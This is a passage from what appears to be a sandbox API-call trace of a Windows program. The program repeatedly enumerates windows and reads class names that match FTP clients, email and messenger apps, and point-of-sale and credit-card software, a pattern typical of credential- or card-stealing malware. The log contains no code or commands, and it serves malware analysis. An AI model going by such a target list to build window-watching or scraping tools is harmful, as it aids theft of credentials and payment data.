lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="foxmailincmailapp") returned 17 [0160.874] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="fling_win") returned 9 [0160.874] GetClassNameA (in: hWnd=0x20222, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="gmailnotifierpro_wnd") returned 20 [0160.874] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="flashfxpwindow") returned 14 [0160.874] GetClassNameA (in: hWnd=0x2021e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="icqcls") returned 6 [0160.874] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="filezilla_class") returned 15 [0160.874] GetClassNameA (in: hWnd=0x10278, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="farwin") returned 6 [0160.874] GetClassNameA (in: hWnd=0x10276, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="coreftpapp") returned 10 [0160.874] GetClassNameA (in: hWnd=0x10274, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="bitkinexapp") returned 11 [0160.874] GetClassNameA (in: hWnd=0x10272, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="barcaapp") returned 8 [0160.874] GetClassNameA (in: hWnd=0x10270, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="alftpwnd") returned 8 [0160.874] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="absolutetelnetwin") returned 17 [0160.874] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="3dftp") returned 5 [0160.875] GetClassNameA (in: hWnd=0x300e0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.875] GetClassNameA (in: hWnd=0x300b8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0160.875] GetClassNameA (in: hWnd=0x300de, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0160.875] GetClassNameA (in: hWnd=0x300c4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.875] GetClassNameA (in: hWnd=0x300f2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.875] GetClassNameA (in: hWnd=0x400ae, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.875] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0160.875] GetClassNameA (in: hWnd=0x10266, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="unit_wnd") returned 8 [0160.875] GetClassNameA (in: hWnd=0x10264, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="spcwin_") returned 7 [0160.875] GetClassNameA (in: hWnd=0x10262, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="spgagentservice_app") returned 19 [0160.875] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="utg2win") returned 7 [0160.875] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="accuposapp") returned 10 [0160.875] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="aldelowin") returned 9 [0160.875] GetClassNameA (in: hWnd=0x10258, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="afr38_cls") returned 9 [0160.875] GetClassNameA (in: hWnd=0x10248, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="isspos_class") returned 12 [0160.875] GetClassNameA (in: hWnd=0x10256, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="centralcreditcardwindow") returned 23 [0160.876] GetClassNameA (in: hWnd=0x10254, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="creditservice_win") returned 17 [0160.876] GetClassNameA (in: hWnd=0x10252, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="fpos_class") returned 10 [0160.876] GetClassNameA (in: hWnd=0x30224, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="mxslipstreamcls") returned 15 [0160.876] GetClassNameA (in: hWnd=0x10250, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="leechftpcls") returned 11 [0160.876] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ncftp_window") returned 12 [0160.876] GetClassNameA (in: hWnd=0x10246, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="active-chargewindow") returned 19 [0160.876] GetClassNameA (in: hWnd=0x10244, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="edcsvr_app") returned 10 [0160.876] GetClassNameA (in: hWnd=0x20220, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ccv_server_cls") returned 14 [0160.876] GetClassNameA (in: hWnd=0x10204, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Four_win") returned 8 [0160.876] GetClassNameA (in: hWnd=0x10202, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="treatmentaboutcls") returned 17 [0160.876] GetClassNameA (in: hWnd=0x10200, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="focus_memory_base_window") returned 24 [0160.876] GetClassNameA (in: hWnd=0x201f6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Mr_Us_cls") returned 9 [0160.876] GetClassNameA (in: hWnd=0x201f0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="land_Be_Area_wnd") returned 16 [0160.876] GetClassNameA (in: hWnd=0x1021c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="future_Employee_wnd") returned 19 [0160.876] GetClassNameA (in: hWnd=0x1021a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="wrongcls") returned 8 [0160.876] GetClassNameA (in: hWnd=0x10206, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Treatclass") returned 10 [0160.877] GetClassNameA (in: hWnd=0x201fe, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="offer_Shot_class") returned 16 [0160.877] GetClassNameA (in: hWnd=0x10218, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="surface_cls") returned 11 [0160.877] GetClassNameA (in: hWnd=0x201f8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Minute_majority_Recognize_class") returned 31 [0160.877] GetClassNameA (in: hWnd=0x10216, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Quickly_Mention_learn_class") returned 27 [0160.877] GetClassNameA (in: hWnd=0x10214, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Totalwindow") returned 11 [0160.877] GetClassNameA (in: hWnd=0x201ee, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Stateclass") returned 10 [0160.877] GetClassNameA (in: hWnd=0x10210, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="our_Available_Watch_wnd") returned 23 [0160.877] GetClassNameA (in: hWnd=0x1020c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Reality_") returned 8 [0160.877] GetClassNameA (in: hWnd=0x201fa, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="few_app") returned 7 [0160.877] GetClassNameA (in: hWnd=0x201f4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="at_effort_app") returned 13 [0160.877] GetClassNameA (in: hWnd=0x201fc, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="shoot_decade_Effect_class") returned 25 [0160.877] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.877] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.877] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.877] GetClassNameA (in: hWnd=0x10182, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.877] GetClassNameA (in: hWnd=0x10180, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.878] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.878] GetClassNameA (in: hWnd=0x10170, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.878] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.878] GetClassNameA (in: hWnd=0x30152, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0160.878] GetClassNameA (in: hWnd=0x201e4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.878] GetClassNameA (in: hWnd=0x101e0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0160.878] GetClassNameA (in: hWnd=0x201de, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0160.878] GetClassNameA (in: hWnd=0x201d2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ATL:733658F8") returned 12 [0160.878] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.878] GetClassNameA (in: hWnd=0x101b0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.878] GetClassNameA (in: hWnd=0x2018a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.878] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0160.878] GetClassNameA (in: hWnd=0x10158, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0160.878] GetClassNameA (in: hWnd=0x10154, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0160.878] GetClassNameA (in: hWnd=0x10150, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.878] GetClassNameA (in: hWnd=0x20140, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0160.878] GetClassNameA (in: hWnd=0x10134, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0160.879] GetClassNameA (in: hWnd=0x10132, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0160.879] GetClassNameA (in: hWnd=0x20128, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0160.879] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0160.879] GetClassNameA (in: hWnd=0x10114, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ATL:000007FEFBCD41F0") returned 20 [0160.879] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0160.879] GetClassNameA (in: hWnd=0x10108, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x60094, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0160.879] GetClassNameA (in: hWnd=0x10100, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x100f6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x5008a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0160.879] GetClassNameA (in: hWnd=0x10080, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x2007e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0160.879] GetClassNameA (in: hWnd=0x10074, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.879] GetClassNameA (in: hWnd=0x10062, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.879] GetClassNameA (in: hWnd=0x20018, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="#43") returned 3 [0160.879] GetClassNameA (in: hWnd=0x1005e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0160.880] GetClassNameA (in: hWnd=0x1004a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0160.880] GetClassNameA (in: hWnd=0x10042, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0160.880] GetClassNameA (in: hWnd=0x3003e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0160.880] GetClassNameA (in: hWnd=0x1007c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Dwm") returned 3 [0160.880] GetClassNameA (in: hWnd=0x2001c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="CicLoaderWndClass") returned 17 [0160.880] GetClassNameA (in: hWnd=0x100e6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Progman") returned 7 [0160.880] GetClassNameA (in: hWnd=0x30124, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x10050, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0160.880] GetClassNameA (in: hWnd=0x1004c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102b8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0xe0242, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102ee, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102ec, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102ea, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102e8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.880] GetClassNameA (in: hWnd=0x102e6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102e4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102e2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102e0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102de, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102dc, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102da, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102d8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102d6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102d4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102d2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102d0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102ce, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102cc, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102ca, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102c8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102c6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.881] GetClassNameA (in: hWnd=0x102c4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102c2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102c0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102be, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102bc, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102ba, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102b6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102b4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102b2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102b0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102ae, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102ac, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102aa, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102a8, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102a6, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.882] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1029e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1029c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x6024a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10260, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10240, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10238, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10236, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10234, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10232, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x10230, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.883] GetClassNameA (in: hWnd=0x1022a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10228, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10226, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10212, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x1020e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10208, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x201f2, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x101ca, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10156, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x1011e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10116, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x1010c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x2009a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x2001a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x10040, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.884] GetClassNameA (in: hWnd=0x100fe, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="MSCTFIME UI") returned 11 [0160.884] GetClassNameA (in: hWnd=0x20016, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="IME") returned 3 [0160.885] Sleep (dwMilliseconds=0x64) [0160.999] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0160.999] GetClassNameA (in: hWnd=0x30122, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0160.999] GetClassNameA (in: hWnd=0x300ac, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0160.999] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0160.999] GetClassNameA (in: hWnd=0x10070, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x10086, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0160.999] GetClassNameA (in: hWnd=0x10078, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0161.000] GetClassNameA (in: hWnd=0x10076, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0161.000] GetClassNameA (in: hWnd=0x10072, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0161.000] GetClassNameA (in: hWnd=0x10052, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Button") returned 6 [0161.000] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0161.000] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0161.000] GetClassNameA (in: hWnd=0x50092, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0161.000] GetClassNameA (in: hWnd=0x10088, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0161.000] GetClassNameA (in: hWnd=0x10268, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="Military_mission_finish_window") returned 30 [0161.000] GetClassNameA (in: hWnd=0x201ea, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="TASKENGINEWINDOWCLASS") returned 21 [0161.000] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0161.000] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="notepad_class") returned 13 [0161.000] GetClassNameA (in: hWnd=0x10298, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="operamailclass") returned 14 [0161.000] GetClassNameA (in: hWnd=0x10296, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="outlook_window") returned 14 [0161.000] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="omniposclass") returned 12 [0161.000] GetClassNameA (in: hWnd=0x10294, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="pidgin_window") returned 13 [0161.000] GetClassNameA (in: hWnd=0x10292, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="scriptftp_wnd") returned 13 [0161.000] GetClassNameA (in: hWnd=0x10290, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="skypeclass") returned 10 [0161.001] GetClassNameA (in: hWnd=0x1028e, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="smartftp") returned 8 [0161.001] GetClassNameA (in: hWnd=0x1028c, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="thunderbird_") returned 12 [0161.001] GetClassNameA (in: hWnd=0x1028a, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="trillianwnd") returned 11 [0161.001] GetClassNameA (in: hWnd=0x10288, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="webdrivewin") returned 11 [0161.001] GetClassNameA (in: hWnd=0x10286, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="whatsapp_window") returned 15 [0161.001] GetClassNameA (in: hWnd=0x10284, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="winscpapp") returned 9 [0161.001] GetClassNameA (in: hWnd=0x10282, lpClassName=0x718fa40, nMaxCount=260 | out: lpClassName="yahoomessengerclass") returned 19 [0162.325] Sleep (dwMilliseconds=0x64) [0162.433] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) [0170.667] EnumWindows (lpEnumFunc=0x2753dd0, lParam=0x2580000) returned 1 [0170.687] Sleep (dwMilliseconds=0x64) [0170.819] EnumWindows 